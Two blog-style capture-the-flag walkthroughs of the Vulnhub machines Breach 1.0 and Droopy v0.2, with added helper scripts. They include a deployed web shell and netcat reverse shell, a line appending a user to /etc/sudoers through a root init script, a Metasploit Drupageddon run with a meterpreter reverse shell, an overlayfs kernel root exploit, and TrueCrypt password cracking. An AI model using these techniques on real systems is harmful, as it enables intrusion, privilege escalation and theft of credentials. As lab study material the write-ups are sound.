Vulnhub – Breach 1.0 walkthrough

First, let's see what we've got. I started with a basic nmap scan:

[image: nmap]

It seems that an active IPS/IDS is present. I tried different nmap evasion techniques, but none of them worked: every port came back as filtered. I checked manually whether port 80 was open, then fired up Nikto; nothing interesting.

[image: Capture]

Let's take a look at those images. Voilà, a little hint:

[image: hint1.PNG]

Okay, check the source code. I found an interesting line:

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

It looks like a hash or an encoded string; my first thought was base64. It turned out to be base64 applied twice: decoding the string two times gave me a username:password pair.
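The double decode above, as an added example that is not part of the original post: a small POSIX shell helper that pulls the base64-looking payload out of the HTML comment and keeps decoding it while the result is still valid base64 and still printable text, so it stops by itself at the username:password layer. The comment string is the one from the page; everything else (function names, the 8-layer cap) is my own.

```shell
#!/bin/sh
# Added example, not from the original post: peel nested base64 layers off a
# string found in an HTML comment. The page's own comment string is the sample
# input; the loop stops as soon as a layer is no longer valid base64 or no
# longer decodes to printable text.

# Pull the first base64-looking run (16+ alphabet chars, optional padding) out
# of the HTML comments arriving on stdin.
comment_candidate() {
  grep -o '<!--[^>]*-->' | grep -oE '[A-Za-z0-9+/]{16,}={0,2}' | head -n 1
}

# True if $1 uses only the base64 alphabet and its length is a multiple of 4.
is_base64() {
  printf '%s' "$1" | grep -Eq '^[A-Za-z0-9+/]+={0,2}$' || return 1
  [ $(( ${#1} % 4 )) -eq 0 ]
}

# Decode repeatedly (at most 8 layers) and print the innermost printable layer.
# Each intermediate layer goes to stderr so you can watch the onion unwrap.
peel_base64() {
  cur=$1
  depth=0
  while [ "$depth" -lt 8 ] && is_base64 "$cur"; do
    next=$(printf '%s' "$cur" | base64 -d 2>/dev/null) || break
    # Stop if the decoded bytes contain anything that is not printable text.
    [ -z "$(printf '%s' "$next" | tr -d '[:print:]\n\t')" ] || break
    depth=$((depth + 1))
    printf 'layer %d: %s\n' "$depth" "$next" >&2
    cur=$next
  done
  printf '%s\n' "$cur"
}

# Usage against a live page (URL is an assumption):
#   peel_base64 "$(curl -s http://192.168.110.140/ | comment_candidate)"
```

The printable-text check is what keeps this from running off into garbage: a real secret such as a password has characters outside the base64 alphabet, so the second layer fails `is_base64` and the loop returns it unchanged.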

[image: source_base64]

Some more digging turned up a CMS portal, ImpressCMS (the Employee portal link on initech.html). Let's see if we can log in with our username/password pair. Login successful, nice. There are 3 messages in the inbox; let's read the first:

[image: keyfile]

I downloaded the keyfile located at the root of the website and found that it is a Java keystore. I read the other two messages, but they did not help much; they did confirm my first thought that an active IDS/IPS is present. I searched for exploits related to ImpressCMS, but the one that could have worked just trolled me:

[image: troll.gif]

At this point I got stuck for a bit. I tried dirbuster, different exploits and XSS on the CMS site, but nothing. I tried to brute-force the admin account, no luck. I looked at the other pictures and pages more deeply, nothing interesting. One option left on the CMS site: check pgibbons' profile. There I found something interesting:

Published by Peter Gibbons on 2016/6/4 21:37:05. (0 reads)
Team – I have uploaded a pcap file of our red team’s re-production of the attack. I am not sure what trickery they were using but I cannot read the file. I tried every nmap switch from my C|EH studies and just cannot figure it out. http://192.168.110.140/impresscms/_SSL_test_phase1.pcap They told me the alias, storepassword and keypassword are all set to ‘tomcat’. Is that useful?? Does anyone know what this is? I guess we are securely encrypted now? -Peter p.s. I’m going fishing for the next 2 days and will not have access to email or phone.

I opened the pcap; the interesting traffic was TLS, and I had no RSA private key to decrypt it with. WAIT! I do have one! I exported the RSA private key from .keyfile (alias, store password and key password are all 'tomcat', per Peter's post) and could then see what the heck had happened:

[image: pcapcreds]

Tomcat Manager is running on port 8443 (https://192.168.110.140:8443/_M@nag3Me/html/); login succeeded with the credentials recovered from the decrypted capture. The capture also showed that shell commands were being run through a cmd.jsp. But where is it? It had been uploaded, but the resource can no longer be found; the author or some system service may have deleted it. A little googling helped here: the manager lets me deploy any WAR file, and there is a ready-made cmd.war on the internet (Laudanum) that does the same thing. So I uploaded it, looked for netcat on the box and made a reverse shell back to my Kali machine.
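The key export and the pcap decryption from the last two steps, as an added example that is not part of the original post. keytool will not hand over a private key directly, so the JKS entry is converted to PKCS#12 first and openssl extracts the key from that; a modulus comparison then confirms the key really belongs to the certificate the server presented in the capture (export it from Wireshark's Certificate handshake record). The alias and passwords ('tomcat') come from Peter's post; the file names, the host/port and the tshark preference name are my assumptions. One caveat before spending time on this: a server private key only decrypts sessions that used RSA key exchange; if the handshake negotiated an (EC)DHE cipher suite the key is useless and you need the session keys instead.

```shell
#!/bin/sh
# Added example, not from the original post: export the RSA private key from
# the Java keystore found at the web root and use it to decrypt the TLS session
# in the pcap. Assumes keytool (JDK), openssl and tshark are installed. Alias and
# passwords ('tomcat') are from the walkthrough; file names, host and port are
# assumptions.

# jks_to_pem <keystore> <alias> <password> <out.pem>
# keytool cannot export a private key on its own, so convert the entry into a
# PKCS#12 bundle first and let openssl write the key out unencrypted.
jks_to_pem() {
  ks=$1; alias=$2; pw=$3; out=$4
  work=$(mktemp -d)
  keytool -importkeystore -noprompt \
      -srckeystore "$ks" -srcstoretype JKS -srcalias "$alias" \
      -srcstorepass "$pw" -srckeypass "$pw" \
      -destkeystore "$work/bundle.p12" -deststoretype PKCS12 \
      -destalias "$alias" -deststorepass "$pw" -destkeypass "$pw" >/dev/null 2>&1 \
    || { rm -rf "$work"; return 1; }
  openssl pkcs12 -in "$work/bundle.p12" -nocerts -nodes \
      -passin "pass:$pw" -out "$out" 2>/dev/null
  rc=$?
  rm -rf "$work"
  [ "$rc" -eq 0 ] && grep -q 'PRIVATE KEY' "$out"
}

# key_matches_cert <key.pem> <cert.pem>
# Returns 0 when the key's RSA modulus equals the certificate's, i.e. this key
# belongs to the certificate the server sent. Worth checking before blaming
# Wireshark for not decrypting anything.
key_matches_cert() {
  k=$(openssl rsa -in "$1" -noout -modulus 2>/dev/null) || return 1
  c=$(openssl x509 -in "$2" -noout -modulus 2>/dev/null) || return 1
  [ -n "$k" ] && [ "$k" = "$c" ]
}

# decrypt_http <pcap> <key.pem> <server-ip> <port>
# Hand the key to tshark and print the decrypted HTTP requests together with any
# Authorization header (where the Tomcat manager credentials show up).
# Assumption: the preference is tls.keys_list on Wireshark 3.0 and later; the
# 2.x releases of the walkthrough's time called it ssl.keys_list.
decrypt_http() {
  tshark -r "$1" \
    -o "tls.keys_list:$3,$4,http,$2" \
    -Y 'http.request' -T fields \
    -e ip.src -e http.request.method -e http.request.uri -e http.authorization
}

# Usage (assumed file names):
#   jks_to_pem .keyfile tomcat tomcat tomcat_key.pem
#   key_matches_cert tomcat_key.pem server_cert.pem && \
#     decrypt_http _SSL_test_phase1.pcap tomcat_key.pem 192.168.110.140 8443
```

The `http.authorization` field carries the `Basic` credentials in base64; `decrypt_http` prints them as sent, so pipe that column through `base64 -d` to read the user:password pair.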

[image: cmd_warcommands_with_jsp]

[image: netcat]

First I tried some Ubuntu 14.04 kernel exploits, but all of them failed. I eventually gave up on exploits and instead sent the LinEnum privilege-escalation checker to the victim and did a quick investigation of what permissions I had.

MySQL login as root with no password was successful. Nice. I found Milton's username and password hash in the database and cracked the hash with oclHashcat. The password was recovered, and switching from the tomcat user to milton worked. Another username and password hash were also there, but I could not crack that one within a reasonable time.

[image: mysql.PNG]

After switching from tomcat to milton I found a "some_script.sh" file with the following content: nothing here.

Okay, dig deeper. Really, nothing here... After some time I found an init script in the init.d folder (portly.sh). This little script redirects all traffic to the portly scanner. Since it runs as root at boot, I'll use it to add milton to sudoers at system startup:

echo 'echo "milton ALL=(ALL) ALL" >> /etc/sudoers' >> /etc/init.d/portly.sh

(Single quotes on the outside keep the inner double quotes and the redirection literal, so the line lands in portly.sh exactly as written. Appending with >> leaves the rest of the script and the existing sudoers entries in place, and it preserves the owner and mode of /etc/sudoers, which sudo checks before it will parse the file; `visudo -c` confirms the result after reboot.)

After the reboot I rebuilt my connections, did a quick sudo su as milton and, voilà, captured the flag.

[image: breach.PNG]


Vulnhub – Droopy: v0.2

Introduction

This is a quick post about how to hack this vulnerable virtual machine from the Vulnhub website. Just to be clear, I am not a security professional; I am just learning and preparing myself for the OSCP exam. If you find any mistake, please let me know.

Walkthrough

First we do some network discovery with netdiscover:

[image: netdisc]

We see that the host is at 192.168.1.159. Let's do an nmap scan:

nmap -sS -A -O -vv 192.168.1.159 -Pn > nmap.txt

PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Welcome to La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | La fraud…
MAC Address: 00:0C:29:4A:B9:32 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.0

Nmap shows a website hosted by Apache with Drupal 7 running on it. I looked at the site and it requires a login and password. Fire up the Metasploit Framework and search for an exploit that fits our target. Drupal 7.0 through 7.31 has a pre-authentication SQL injection in its database abstraction layer (CVE-2014-3704, "Drupageddon"), so that is the obvious thing to try.
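A pre-flight check for the version range above, as an added example that is not part of the original post: Drupal 7 ships CHANGELOG.txt at the web root (robots.txt disallows it, which does not stop a GET), and its first "Drupal 7.x" line is the installed release, so the target can be confirmed as 7.0 to 7.31 before firing the module. The base URL and the sample CHANGELOG lines in the usage comment are my assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: confirm the Drupal core version
# from CHANGELOG.txt before running Drupageddon (CVE-2014-3704, fixed in 7.32).
# Target URL and any sample text are assumptions.

# drupal_version_from_changelog: read CHANGELOG.txt on stdin and print the
# newest "7.31"-style version it lists (first "Drupal N.M" line), or nothing.
drupal_version_from_changelog() {
  grep -m 1 -oE '^Drupal [0-9]+\.[0-9]+' | cut -d' ' -f2
}

# drupageddon_candidate <version>: 0 if the version is 7.0 through 7.31,
# 1 for anything else (other major versions, 7.32+, or unparseable input).
drupageddon_candidate() {
  case "$1" in *.*) ;; *) return 1 ;; esac
  major=${1%%.*}
  minor=${1#*.}
  case "$major$minor" in ''|*[!0-9]*) return 1 ;; esac
  [ "$major" -eq 7 ] && [ "$minor" -le 31 ]
}

# check_target <base-url>: fetch CHANGELOG.txt and report. Exit 0 = in range,
# 1 = Drupal but patched, 2 = no readable CHANGELOG.txt.
check_target() {
  v=$(curl -s --max-time 10 "$1/CHANGELOG.txt" | drupal_version_from_changelog)
  [ -n "$v" ] || { echo "no CHANGELOG.txt or not Drupal"; return 2; }
  if drupageddon_candidate "$v"; then
    echo "Drupal $v: in the 7.0-7.31 Drupageddon range"
  else
    echo "Drupal $v: not in range"
    return 1
  fi
}

# Usage (assumed URL): check_target http://192.168.1.159
```

If CHANGELOG.txt has been removed, the `http-generator` meta tag nmap already showed only says "Drupal 7"; in that case the module's own version probe is the fallback.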

[image: drupal_search]

I chose the third one and crossed my fingers. Boom, we have a meterpreter session.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon) > options

Module options (exploit/multi/http/drupal_drupageddon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.159    yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The target URI of the Drupal installation
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.200    yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Drupal 7.0 - 7.31
msf exploit(drupal_drupageddon) > exploit

[*] Started reverse TCP handler on 192.168.1.200:4444
[*] 192.168.1.159:80 – Testing page
[*] 192.168.1.159:80 – Creating new user SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 – Logging in as SsozXsiTZb:UldknxsZnY
[*] 192.168.1.159:80 – Trying to parse enabled modules
[*] 192.168.1.159:80 – Enabling the PHP filter module
[*] 192.168.1.159:80 – Setting permissions for PHP filter module
[*] 192.168.1.159:80 – Getting tokens from create new article page
[*] 192.168.1.159:80 – Calling preview page. Exploit should trigger…
[*] Sending stage (33068 bytes) to 192.168.1.159
[*] Meterpreter session 9 opened (192.168.1.200:4444 -> 192.168.1.159:35380) at 2016-04-19 11:06:36 +0200

meterpreter >

Good news. Let's look around and pull some information out of the system. I started with the sysinfo command:

meterpreter > sysinfo
Computer : droopy
OS : Linux droopy 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >

So this is an Ubuntu machine with an old kernel (3.13.0-43). I'll try my luck and check whether this machine is vulnerable to the overlayfs vulnerability (CVE-2015-1328, Exploit-DB 37292): what user permissions I have, and whether I can compile my exploit with gcc and run it.
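The checks just listed, as an added example that is not part of the original post. 37292.c needs a 3.13.0-series Ubuntu kernel that predates the fix (USN-2640-1 shipped it for 14.04 as 3.13.0-55), overlayfs, unprivileged user namespaces, a compiler, and a working directory that is not mounted noexec; each of those is cheap to confirm before uploading and building anything. Nothing here exploits anything, it only reports. The mounts text is passed in as a parameter so the parsing can be tested offline; the fixed ABI number is a parameter for the same reason.

```shell
#!/bin/sh
# Added example, not from the original post: pre-flight checks before building
# 37292.c (CVE-2015-1328) on an Ubuntu 14.04 target. Report only, no exploitation.

# abi_number <uname -r>: print NN from a 3.13.0-NN-generic style kernel
# version, or nothing if it is not the 3.13.0 series.
abi_number() {
  printf '%s\n' "$1" | sed -n 's/^3\.13\.0-\([0-9][0-9]*\)-.*/\1/p'
}

# kernel_candidate <uname -r> <fixed-abi>: 0 if the kernel is 3.13.0 with an
# ABI number below the one the distribution advisory fixed (55 for USN-2640-1).
kernel_candidate() {
  abi=$(abi_number "$1")
  [ -n "$abi" ] && [ "$abi" -lt "$2" ]
}

# mount_has_noexec <mountpoint> <mounts-text>: 0 if the mountpoint is listed
# with the noexec option in /proc/mounts-style text.
mount_has_noexec() {
  printf '%s\n' "$2" | awk -v mp="$1" '
    $2 == mp { n = split($4, o, ","); for (i = 1; i <= n; i++) if (o[i] == "noexec") found = 1 }
    END { exit found ? 0 : 1 }'
}

# userns_enabled: 0 if unprivileged user namespaces look usable. Ubuntu exposes
# kernel.unprivileged_userns_clone; without that knob, fall back to whether the
# kernel has user namespaces at all.
userns_enabled() {
  if [ -r /proc/sys/kernel/unprivileged_userns_clone ]; then
    [ "$(cat /proc/sys/kernel/unprivileged_userns_clone)" = 1 ]
  else
    [ -r /proc/self/ns/user ]
  fi
}

# overlayfs_precheck [fixed-abi]: run every check on the local box and print
# one line per result. The 3.13 tree registers the filesystem as "overlayfs";
# upstream kernels from 3.18 call it "overlay", hence the alternation.
overlayfs_precheck() {
  fixed=${1:-55}
  k=$(uname -r)
  if kernel_candidate "$k" "$fixed"; then echo "kernel $k: 3.13.0 ABI below $fixed, candidate"
  else echo "kernel $k: not a 3.13.0 kernel below ABI $fixed"; fi
  if grep -qE 'overlay(fs)?$' /proc/filesystems; then echo "overlayfs registered"
  else echo "overlayfs not in /proc/filesystems (may still load as a module)"; fi
  if userns_enabled; then echo "user namespaces usable"; else echo "user namespaces disabled"; fi
  if command -v gcc >/dev/null 2>&1; then echo "gcc present"; else echo "no gcc: build elsewhere, static"; fi
  if mount_has_noexec /tmp "$(cat /proc/mounts)"; then echo "/tmp is noexec: use another directory"
  else echo "/tmp allows execution"; fi
}
```

Run `overlayfs_precheck` from the meterpreter shell before the upload step; a "no gcc" result means compiling on an attacker box with `gcc -static` and uploading the binary instead.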

First, transfer the exploit to /tmp with meterpreter's upload command and try to run it:

meterpreter > getuid
Server username: www-data (33)
meterpreter > upload /root/Downloads/37292.c /tmp
[*] uploading : /root/Downloads/37292.c -> /tmp
[*] uploaded : /root/Downloads/37292.c -> /tmp/37292.c
meterpreter > shell
Process 1256 created.
Channel 1 created.
cd /tmp
gcc 37292.c -o exploit
chmod +x exploit
./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 0: can’t access tty; job control turned off
# whoami
root
#

Nice, we have root access to the system; let's find the flag. The flag usually lives in root's home directory, so let's see what we have:

dave.tc

dave.tc? What? After googling a bit I found that the .tc extension could be a TrueCrypt volume. TrueCrypt is discontinued, and password-protected volumes can be cracked with the right tool and a good dictionary. My first thought was oclHashcat because I have an AMD card; TrueCrack in Kali Linux supports Nvidia cards (only?). I did not check whether it supports AMD too, because I am happy with oclHashcat. When I downloaded this vulnerable machine I saw two hints:

1.) Grab a copy of the rockyou wordlist.

2.) It’s fun to read other people’s email.

Okay, I have the rockyou wordlist, so check /var/mail:

[image: mail]

Okay, let’s rock:

oclHashcat64.exe -a 0 -m 6211 -p : --session=all -o "D:\Penetration\HASHGPUCRACK\dave_found.txt" --outfile-format=3 -w 3 --gpu-temp-disable "C:\Users\media\Desktop\dave.tc" "D:\Penetration\wordlist\rockyou.txt"

Exhausted. Nothing. Several hours later, still nothing. I tried applying rules (best64) and different dictionaries, nothing. The last sentence of the mail could also be a hint, so I did a combinator attack (downloaded lyrics from The Jam, built a dictionary from them and combined it with rockyou). Still no luck. Would I fail at this point? It had been so easy until now. TRY HARDER! I took a break, and when I sat down in front of my computer again I had a clue. What if I was using the wrong hashing algorithm? Some people on the hashcat forums mentioned trying SHA-512 instead of RIPEMD-160. Okay, fire up oclHashcat again:

oclHashcat64.exe -a 0 -m 6221 -p : --session=all -o "D:\Penetration\HASHGPUCRACK\dave_found.txt" --outfile-format=3 -w 3 --gpu-temp-disable "C:\Users\media\Desktop\dave.tc" "D:\Penetration\wordlist\rockyou.txt"

After a couple of minutes it finished. Cracked. Okay, let's install TrueCrypt and check what we've got. When it prompted for the password I tried copy/paste and... wrong password. OMG, what is happening? Again Ctrl+C, Ctrl+V, still no luck. Could it be? What if I type the password instead of pasting it? Yes, it was my fault. It mounted the volume as drive H:
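The lesson of the two hashcat runs above, as an added example that is not part of the original post: a TrueCrypt container has no header field that says which PBKDF2 hash (RIPEMD-160, SHA-512, Whirlpool) or which cipher cascade was used, because the header is itself encrypted, so a cracking run that tries only one mode can exhaust a good wordlist and learn nothing. hashcat needs just the 512-byte volume header (the hidden-volume header sits at offset 65536), and the helper below feeds that header through every TrueCrypt mode in turn, single ciphers first. File names are my assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: extract a TrueCrypt volume header
# and drive hashcat through every TrueCrypt mode, since nothing in the container
# reveals which hash or cipher cascade was chosen. Assumes hashcat in PATH.

# tc_header <container> <out> [hidden]: copy the 512-byte header hashcat hashes.
# The standard header is the first 512 bytes; a hidden volume's header lives at
# byte offset 65536 (sector 128).
tc_header() {
  if [ "${3:-}" = hidden ]; then
    dd if="$1" of="$2" bs=512 skip=128 count=1 2>/dev/null
  else
    dd if="$1" of="$2" bs=512 count=1 2>/dev/null
  fi
  [ "$(wc -c < "$2")" -eq 512 ]
}

# tc_modes: hashcat modes for TrueCrypt, ordered cheapest-first.
#   62x1 single cipher (512-bit XTS key), 62x2 two-cipher cascade, 62x3 three.
#   621x RIPEMD-160, 622x SHA-512, 623x Whirlpool, 624x RIPEMD-160 boot volume
#   (system encryption only allows RIPEMD-160, so no 625x/626x exist).
tc_modes() {
  echo 6211 6221 6231 6212 6222 6232 6213 6223 6233 6241 6242 6243
}

# tc_crack <header> <wordlist> [extra hashcat args...]: try each mode and stop
# at the first that recovers the password. hashcat exits 0 when it cracks the
# hash and 1 when the wordlist is exhausted, which is what the loop keys on.
tc_crack() {
  hdr=$1; wl=$2; shift 2
  for m in $(tc_modes); do
    if hashcat -a 0 -m "$m" --potfile-disable -o "$hdr.$m.cracked" \
         "$hdr" "$wl" "$@" >/dev/null 2>&1; then
      echo "mode $m cracked: $(cat "$hdr.$m.cracked")"
      return 0
    fi
  done
  echo "exhausted all TrueCrypt modes"
  return 1
}

# Usage (assumed names):
#   tc_header dave.tc dave.hdr && tc_crack dave.hdr rockyou.txt -w 3
#   tc_header dave.tc dave.hidden.hdr hidden   # only if a hidden volume is suspected
```

Passing the whole container works too (hashcat reads only what it needs), but the 512-byte header is what you actually want to copy off a target, and it makes the hidden-volume case explicit. If a run still exhausts every mode, the remaining variables are keyfiles (`--truecrypt-keyfiles`) and a non-default PIM, neither of which a wordlist alone can cover.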

[image: drive]

Let's check out this drive. Nothing interesting: some jpg files and a .secret folder. Hmm!

I opened it, and under the .top folder I captured the flag.

[image: flag]

This was quite fun! Thank you!